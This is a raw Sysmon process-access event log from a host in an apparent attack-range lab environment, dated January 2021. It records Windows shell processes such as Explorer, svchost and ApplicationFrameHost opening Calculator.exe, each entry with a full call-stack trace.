Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362316Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed 10341000x8000000000000000362315Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b 10341000x8000000000000000362314Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362313Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362312Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362311Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.757{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362310Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362309Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362308Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\combase.dll+a3e41|C:\Windows\System32\combase.dll+a3fc6 10341000x8000000000000000362307Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362306Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362305Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362304Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362303Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362302Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362301Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362300Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362299Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362298Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362297Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.741{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362296Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.725{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362295Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.725{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362294Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.725{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362293Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.725{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 